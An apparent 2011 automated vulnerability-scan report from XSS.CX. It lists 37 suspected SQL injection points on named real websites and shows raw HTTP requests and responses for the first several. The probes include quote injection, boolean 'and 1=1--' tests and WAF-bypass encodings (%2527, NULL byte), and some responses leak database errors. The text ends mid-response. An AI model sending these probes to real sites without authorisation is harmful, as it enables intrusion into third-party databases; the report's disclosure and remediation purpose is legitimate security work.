SQL Injection, DORK, Example, Proof of Concept, Report on April 16, 2011

CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Report generated by XSS.CX at Sun Apr 17 13:22:00 CDT 2011.

XSS.CX Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

XSS.CX Home | XSS.CX Research Blog
Loading

1. SQL injection

1.1. http://googleads.g.doubleclick.net/pagead/ads [Referer HTTP header]

1.2. http://googleads.g.doubleclick.net/pagead/ads [u_nmime parameter]

1.3. http://www.amazon.com/gp/product/0975264001 [Referer HTTP header]

1.4. http://www.amenme.com/AmenMe/Amens/AmenToThis.aspx [Referer HTTP header]

1.5. http://www.brownrudnick.com/disc/cntcdisclaimer.asp [ID parameter]

1.6. http://www.brownrudnick.com/nr/articlesIndv.asp [ID parameter]

1.7. http://www.colivia.de/submit.php [name of an arbitrarily supplied request parameter]

1.8. http://www.dealer.com/media/uploads/page/loading.gif [exp_tracker cookie]

1.9. http://www.dealer.com/products/lead-management/call-tracking/media/uploads/page/loading.gif [com.silverpop.iMA.page_visit./showcase/featured-client/ cookie]

1.10. http://www.dealer.com/products/lead-management/call-tracking/media/uploads/page/media/uploads/page/loading.gif [com.silverpop.iMA.page_visit./ cookie]

1.11. http://www.dealer.com/products/lead-management/call-tracking/media/uploads/page/media/uploads/page/loading.gif [com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/ cookie]

1.12. http://www.dealer.com/products/lead-management/media/uploads/page/loading.gif [com.silverpop.iMA.page_visit./company/history/ cookie]

1.13. http://www.dealer.com/products/lead-management/media/uploads/page/loading.gif [com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/ cookie]

1.14. http://www.dealer.com/products/media/uploads/page/loading.gif [__utmc cookie]

1.15. http://www.dealer.com/products/media/uploads/page/loading.gif [com.silverpop.iMA.page_visit./ cookie]

1.16. http://www.dealer.com/products/online-advertising/powermail/media/uploads/page/loading.gif [com.silverpop.iMA.page_visit./showcase/featured-client/ cookie]

1.17. http://www.dealer.com/products/websites/media/uploads/page/loading.gif [ssoid cookie]

1.18. http://www.dealer.com/services/managed-services/media/uploads/page/loading.gif [__utma cookie]

1.19. http://www.dealer.com/services/managed-services/media/uploads/page/loading.gif [com.silverpop.iMA.page_visit./products/online-advertising/ cookie]

1.20. http://www.dealer.com/services/managed-services/media/uploads/page/loading.gif [exp_last_visit cookie]

1.21. http://www.dealer.com/solutions/agencies/media/uploads/page/loading.gif [__utmc cookie]

1.22. http://www.dealer.com/solutions/agencies/media/uploads/page/loading.gif [com.silverpop.iMA.page_visit./company/contact/ cookie]

1.23. http://www.dealer.com/solutions/dealer-groups/media/uploads/page/loading.gif [__utma cookie]

1.24. http://www.dealer.com/solutions/dealer-groups/media/uploads/page/loading.gif [com.silverpop.iMA.page_visit./products/online-advertising/ cookie]

1.25. http://www.dealer.com/solutions/dealer-groups/media/uploads/page/loading.gif [exp_last_visit cookie]

1.26. http://www.dealer.com/solutions/media/uploads/page/loading.gif [__utmb cookie]

1.27. http://www.dealer.com/solutions/media/uploads/page/loading.gif [exp_last_activity cookie]

1.28. http://www.dealer.com/solutions/oem/media/uploads/page/loading.gif [__utmc cookie]

1.29. http://www.gabbr.com/inc/fauxMenu.css [REST URL parameter 1]

1.30. http://www.gabbr.com/inc/fauxMenu.css [REST URL parameter 2]

1.31. http://www.gabbr.com/submit/ [REST URL parameter 1]

1.32. http://www.info.com/ [name of an arbitrarily supplied request parameter]

1.33. http://www.linkagogo.com/go/AddNoPopup [name of an arbitrarily supplied request parameter]

1.34. http://www.longislanderotic.com/longislanderotic/forum/ [Referer HTTP header]

1.35. http://www.longislanderotic.com/longislanderotic/forum/ [User-Agent HTTP header]

1.36. http://www.longislanderotic.com/longislanderotic/forum/ [name of an arbitrarily supplied request parameter]

1.37. http://www.martindale.com/all/c-england/all-lawyers-6.htm [WT_FPC cookie]


1. SQL injection
There are 37 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

1.1. http://googleads.g.doubleclick.net/pagead/ads [Referer HTTP header]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1302986506&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fdork%2Flawyers%2Fxss-dork-lawyers-cross-site-scripting-poc-example-report.html&dt=1302968506484&shv=r20110406&jsv=r20110412&saldr=1&correlator=1302968506512&frm=0&adk=1607234649&ga_vid=1224811281.1302968507&ga_sid=1302968507&ga_hid=83834452&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1079&bih=1016&eid=33895130&fu=0&ifi=1&dtd=320&xpc=uBbhJocMVV&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110409%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110409%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110409%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110409%3A1
Referer: http://www.google.com/search?hl=en&q=%2527

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 16 Apr 2011 16:08:22 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12429

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
XhhbXBsZS1yZXBvcnQuaHRtbIACAagDAcgDF-gD1QXoA8EH9QMCAADE&num=3&sig=AGiWqtxWfC_K2Bhyi6LFL3PTldRfLjjWHA&client=ca-pub-4063878933780912&adurl=http://www.depuyhipreplacementlawyer.com/depuy-hip-replacement-failure/depuy-hip-replacement-lawsuit/" id=aw2 onclick="ha('aw2')" onfocus="ss('','aw2')" onmousedown="st('aw2')" onmouseover="return ss('','aw2')" target=_top title="DepuyHipReplacementLawyer.com">
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1302986506&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fdork%2Flawyers%2Fxss-dork-lawyers-cross-site-scripting-poc-example-report.html&dt=1302968506484&shv=r20110406&jsv=r20110412&saldr=1&correlator=1302968506512&frm=0&adk=1607234649&ga_vid=1224811281.1302968507&ga_sid=1302968507&ga_hid=83834452&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1079&bih=1016&eid=33895130&fu=0&ifi=1&dtd=320&xpc=uBbhJocMVV&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110409%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110409%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110409%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110409%3A1
Referer: http://www.google.com/search?hl=en&q=%2527%2527

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 16 Apr 2011 16:08:23 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 3445

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
1.2. http://googleads.g.doubleclick.net/pagead/ads [u_nmime parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The u_nmime parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the u_nmime parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1302986506&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fdork%2Flawyers%2Fxss-dork-lawyers-cross-site-scripting-poc-example-report.html&dt=1302968506484&shv=r20110406&jsv=r20110412&saldr=1&correlator=1302968506512&frm=0&adk=1607234649&ga_vid=1224811281.1302968507&ga_sid=1302968507&ga_hid=83834452&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44'&biw=1079&bih=1016&eid=33895130&fu=0&ifi=1&dtd=320&xpc=uBbhJocMVV&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110409%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110409%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110409%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110409%3A1

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 16 Apr 2011 16:01:23 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12303

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
XhhbXBsZS1yZXBvcnQuaHRtbIACAagDAcgDF-gD1QXoA8EH9QMCAADE&num=1&sig=AGiWqtzm9sXov0AWw3n64wBzfgt2emw7mw&client=ca-pub-4063878933780912&adurl=http://www.depuyhipreplacementlawyer.com/depuy-hip-replacement-failure/depuy-hip-replacement/" id=aw0 onclick="ha('aw0')" onfocus="ss('','aw0')" onmousedown="st('aw0')" onmouseover="return ss('','aw0')" target=_top title="DepuyHipReplacementLawyer.com">
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1302986506&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fdork%2Flawyers%2Fxss-dork-lawyers-cross-site-scripting-poc-example-report.html&dt=1302968506484&shv=r20110406&jsv=r20110412&saldr=1&correlator=1302968506512&frm=0&adk=1607234649&ga_vid=1224811281.1302968507&ga_sid=1302968507&ga_hid=83834452&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44''&biw=1079&bih=1016&eid=33895130&fu=0&ifi=1&dtd=320&xpc=uBbhJocMVV&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110409%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110409%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110409%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110409%3A1

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 16 Apr 2011 16:01:24 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12364

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
1.3. http://www.amazon.com/gp/product/0975264001 [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.amazon.com
Path:   /gp/product/0975264001

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /gp/product/0975264001 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 17:15:13 GMT
Server: Server
x-amz-id-1: 116FDZQJ7NH9YPBQYRJG
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: h1Q3zWrHB6KCjOR02wKvZAV4QaXU2TVWIXCNi1+Rb0hoYItiSffzaw+PVLpBFKFy
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=176-5812018-3395845; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 398822


<html>
<head>


<style type="text/css"><!--


BODY
...[SNIP]...
default",
       title: "&nbsp;",
       location: "left",
       onHide: function() {
           try {
               amznJQ.available('ClientEventLogger', function() {
                   ClientEventLogger.logActionCode('ac1');
               });
           } catch (exception) {}
       }
   });
});
</script>
...[SNIP]...

Request 2

GET /gp/product/0975264001 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00''

Response 2

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 17:15:16 GMT
Server: Server
x-amz-id-1: 10QJP175CEVXVBW7GS74
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: fbUA3kqin+jKCLQZbAOy6Iy5/kC5UBa2yJ5OWqyWVd2C4dg1tjVXTObuPD2xgY6Q
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=181-1530651-2167064; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 397224


<html>
<head>


<style type="text/css"><!--


BODY
...[SNIP]...
1.4. http://www.amenme.com/AmenMe/Amens/AmenToThis.aspx [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.amenme.com
Path:   /AmenMe/Amens/AmenToThis.aspx

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /AmenMe/Amens/AmenToThis.aspx HTTP/1.1
Host: www.amenme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 17 Apr 2011 17:08:24 GMT
Connection: close
Content-Length: 9496

<html>
<head>
<title>Unclosed quotation mark after the character string 'http://www.google.com/search?hl=en&amp;q=''.<br>Incorrect syntax near 'http://www.google.com/search?hl=en&amp;q=''.</title>
...[SNIP]...

Request 2

GET /AmenMe/Amens/AmenToThis.aspx HTTP/1.1
Host: www.amenme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /AmenMe/Amens/AmenSomethingNow.aspx?url=http%3a%2f%2fwww.google.com%2fsearch%3fhl%3den%26q%3d%27%27&title=&desc=&cat=
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 17 Apr 2011 17:08:25 GMT
Connection: close
Content-Length: 246

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/AmenMe/Amens/AmenSomethingNow.aspx?url=http%3a%2f%2fwww.google.com%2fsearch%3fhl%3den%26q%3d%27%27&amp;title=&amp;de
...[SNIP]...
1.5. http://www.brownrudnick.com/disc/cntcdisclaimer.asp [ID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.brownrudnick.com
Path:   /disc/cntcdisclaimer.asp

Issue detail

The ID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the ID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft Access.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /disc/cntcdisclaimer.asp?ID=461' HTTP/1.1
Host: www.brownrudnick.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDSSSASTRS=FHKLAMJAAMPCLADDLOGDPJOG;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 16 Apr 2011 15:09:58 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Connection: close
Content-Length: 12647
Content-Type: text/html
Cache-control: private

<html>

<head>

<meta http-equiv="Content-Language" content="en-us">

<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Brown Rudnick - Notice</title>
<link rel
...[SNIP]...
</i> Microsoft OLE DB Provider for ODBC Drivers<br>
...[SNIP]...
1.6. http://www.brownrudnick.com/nr/articlesIndv.asp [ID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.brownrudnick.com
Path:   /nr/articlesIndv.asp

Issue detail

The ID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the ID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft Access.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /nr/articlesIndv.asp?ID=554' HTTP/1.1
Host: www.brownrudnick.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDSSSASTRS=FHKLAMJAAMPCLADDLOGDPJOG;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 16 Apr 2011 15:05:45 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Connection: close
Content-Length: 11174
Content-Type: text/html
Cache-control: private

<html>

<head>

<meta http-equiv="Content-Language" content="en-us">

<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Brown Rudnick - Articles</title>
<link r
...[SNIP]...
</i> Microsoft OLE DB Provider for ODBC Drivers<br>
...[SNIP]...
1.7. http://www.colivia.de/submit.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.colivia.de
Path:   /submit.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload " was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /submit.php/1" HTTP/1.1
Host: www.colivia.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 17:13:34 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=a21b075ab6ae7b749402f3acf5846f94; path=/
Connection: close
Content-Type: text/html
Content-Length: 13986

<br />
<b>Warning</b>: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"/submit.php/1"" LIMIT 1' at line 1 in <b>
...[SNIP]...
1.8. http://www.dealer.com/media/uploads/page/loading.gif [exp_tracker cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /media/uploads/page/loading.gif

Issue detail

The exp_tracker cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the exp_tracker cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; exp_last_activity=1303002163; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D'%20and%201%3d1--%20; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.1.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 19887
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:03:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303002238; expires=Mon, 16-Apr-2012 01:03:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>For dealers who want to compete using SEO, they don&#8217;t need to build outside microsites for content anymore. They can do it right inside the Dealer.com platform.</p>
   <cite>Brian Pasch, Pasch Consulting Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>We were looking for an all-in-one solution&#8212;one company with expertise in all the different fields. That is why we chose Dealer.com. </p>
   <cite>Roy Rueter, e-Business Director, Sheehy Auto Stores</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>There is one system I can log into to access all my tools.</p>
   <cite>Mitchell Brenner, Precision Acura</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Our account manager is always pleasant, efficient and communicates really well with us.</p>
   <cite>Carrie Casebeer, Capitol Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We wanted to be a true eCommerce portal and other providers weren't able to do what we wanted. After searching, it was a complete no-brainer. Dealer.com has all the capabilities we needed.</p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/online-advertising/search-engine-optimization/" title="ManagedSEO Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/ManagedSEO.jpg" alt="Ranked higher in the search engines with ManagedSEO" /></a>
</li>

<li>
   <a href="/products/websites/mobile-sites/" title="MobileSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-mobilesites1.jpg" alt="Mobile Websites" /></a>
